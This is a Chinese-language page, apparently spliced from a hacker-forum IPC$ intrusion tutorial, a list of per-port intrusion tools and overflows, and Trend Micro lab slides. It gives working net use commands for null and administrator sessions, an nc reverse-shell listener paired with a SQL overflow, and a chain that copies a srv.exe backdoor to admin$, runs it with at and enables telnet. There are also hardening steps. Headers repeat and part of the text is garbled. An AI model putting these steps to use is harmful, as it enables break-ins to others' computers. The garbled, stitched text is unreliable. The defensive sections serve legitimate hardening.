(1)用任何办法得到一个帐户与口令(猜测,破解),网上流传有一个叫做smbcrack的软件就是利用ipc$来破解帐户口令的。如果你的密码位数不高,又很简单,是很容易被破解的。根据我的个人经验,相当多的人都将administrator的口令设为123,200用server服务, Task Scheduler服务,去掉网络文件和打印机共享前的对勾,当然,给自己的帐户加上强壮的口令才是最关键的。

各个网络端口的入侵附[135,IPC$入侵详解

各个网络端口的入侵附[135,IPC$入侵详解

各个网络端口的入侵附[135,IPC$入侵详解各个网络端口的入侵附[135,IPC$入侵详解]2010年01月28日星期四 12:401. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。

(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。

(啊D的注入软件)。

5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。

(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。

(servlocal.exe)对serv-u的MD5加密密码,可以用字典暴破。

(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码6. 554端口用real554.exe入侵。

7. 6129端口用DameWare6129.exe入侵。

8. 系统漏洞利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。

9. 3127等端口可以利用doom病毒开的端口,用nodoom.exe入侵。

(可用mydoomscan.exe查)。

4-2-IPC$入侵(共12张)

4-2-IPC$入侵(共12张)
第11页,共12页。
补充二:在XP系统(xìtǒng)下能否使用IPC$连接?
通过上网查找有关资料并试验,看看在XP系统 下,还能否使用IPC$连接进行文件共享和远程管理?
第12页,共12页。
第4页,共12页。
2、入侵过程(前提:获取对方主机的IP、管理员帐号密 码等信息) 1)进入DOS模式
2)建立IPC$连接
Net use \\IP\IPC$ “PASSWord” /user:“UserName”
3)映射磁盘
Net use z: \\IP\盘符$
4)打开“资源管理器”,进行(jìnxíng)文件的查找、复制等 操作。 5)断开连接
在 WindowsNT 中 SMB 基于 NBT 实现,即使用 139 ( TCP )端口;而在 Windows2000 中, SMB 除了基于 NBT 实现,还可以直接通过 445 端口实现。
Windows系统默认会设置共享目录,这些共享是隐藏 的,只有管理员能够对他们进行远程操作。
在MS-DOS中键入“net share”命令可查看本机共 享资源。
Net send 10.10.49.3 你好 也可以使用对方的机子向其他的机子发送虚假信息 at //10.10.49.3 1:00 net send 10.10.49.2 你好
IPC连接的终极目的: 打开对方的TELNET 以TELNET方式登录对方电脑 直接控制对方电脑 AT //10.10.49.3 1:00 SC CONFIG TLNTSVR START= AUTO AT //10.10.49.3 1:00 net start telnet
中不包含空格时两边的双引号可以省略,如果密码为空, 可以直接输入两个引号“”即可;
10 如果在已经建立好连接的情况下对方重启计算机, 那么ipc$连接将会自动断开,需要重新建立连接。

实验6 ICP$攻击

实验6 ICP$攻击

• 在通过新开启的端口,Telnet对方,就可以为所欲 为了。
Copyright 2009 Trend Micro Inc.
防范IPC$入侵
• 1) 关闭139、445端口
– 139:禁用“TCP/IP”的“NET BIOS”
Copyright 2009 Trend Micro Inc.
防范IPC$入侵
—在知道用户的账号后(如电子邮件@前面的部分) 利用一些专门软件强行破解用户口令
– 字典攻击 – 强行攻击 – 组合攻击
—其他攻击类型
– 社会工程学 – 偷窥:观察别人敲口令
Copyright 2009 Trend Micro Inc.
典型的IPC$攻击的步骤
• 1.用流光等扫描工具扫描开启空连接(不需要用户名和 密码的IPC$连接)的主机,并破解主机的用户名和口 令。
• 1) 关闭139、445端口
– 139:禁用“TCP/IP”的“NET BIOS” – 445:HKEY-LOCAL-MACHINE-System-CurrentControlSetServices-NetBT-Parameters 下新建REG—DWORD类型的子键, 并命名为SMBDeviceEnable,值为0
(可以查看、修改、新建文件,添加、删除用户,启动、关闭服 务等)
Copyright 2009 Trend Micro Inc.
主机IPC$攻击虚拟机 实验步骤
• 1使用流光工具扫描开启IPC$空连接的主机。 • 文件—高级扫描向导
Copyright 2009 Trend Micro Inc.
主机IPC$攻击虚拟机 实验步骤
Copyright 2009 Trend Micro Inc.
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

IPC$(Internet Process Connection)是共享"命名管道"的资源它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

介绍IPC$:1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。

也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表建立ipc$连接在hack攻击中的作用就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.四ipc$与空连接,139,445端口,默认共享的关系以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)1)ipc$与空连接:不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).2)ipc$与139,445端口:ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.3)ipc$与默认共享默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提嵌苑矫挥泄乇照庑┠ 瞎蚕?五ipc$连接失败的原因以下5个原因是比较常见的:1)你的系统不是NT或以上操作系统;2)对方没有打开ipc$默认共享3)对方未开启139或445端口(惑被防火墙屏蔽)4)你的命令输入有误(比如缺少了空格等)5)用户名或密码错误(空连接当然无所谓了)另外,你也可以根据返回的错误号分析原因:错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;错误号51,Windows 无法找到网络路径: 网络有问题;错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);错误号67,找不到网络名:你的lanmanworkstation服务未启动;目标删除了ipc$;错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连。

错误号1326,未知的用户名或错误密码:原因很明显了;错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动。

(连接域控会出现此情况)错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。

关于ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.六如何打开目标的IPC$(此段引自相关文章)首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马,当然,这shell必须是admin权限的,然后你可以使用shell执行命令net share ipc$ 来开放目标的ipc$。

从上面可以知道,ipc$能否使用还有很多条件。

请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。

七如何防范ipc$入侵1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)首先运行regedit,找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)2禁止默认共享1)察看本地共享资源运行-cmd-输入net share2)删除共享(每次输入一个)net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete(如果有e,f,……可以继续删除)3)停止server服务net stop server /y (重新启动后server服务会重新开启)4)修改注册表运行-regeditserver版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。

如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-已禁用4安装防火墙(选中相关设置),或者端口过滤(滤掉139,445等),或者用新版本的优化大师5设置复杂密码,防止通过ipc$穷举密码(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创)八相关命令1)建立空连接:net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)2)建立非空连接:net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)3)映射默认共享:net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令net use z: \\IP\c$4)删除一个ipc$连接net use \\IP\ipc$ /del5)删除共享映射net use c: /del 删除映射的c盘,其他盘类推net use * /del 删除全部,会有提示要求按y确认九经典入侵模式这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

2. C:\>copy srv.exe \\127.0.0.1\admin$先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

3. C:\>net time \\127.0.0.1查查时间,发现127.0.0.1 的当前时间是2002/3/19 上午11:00,命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)5. C:\>net time \\127.0.0.1再查查到时间没有?如果127.0.0.1 的当前时间是2002/3/19 上午11:05,那就准备开始下面的命令。

相关文档
最新文档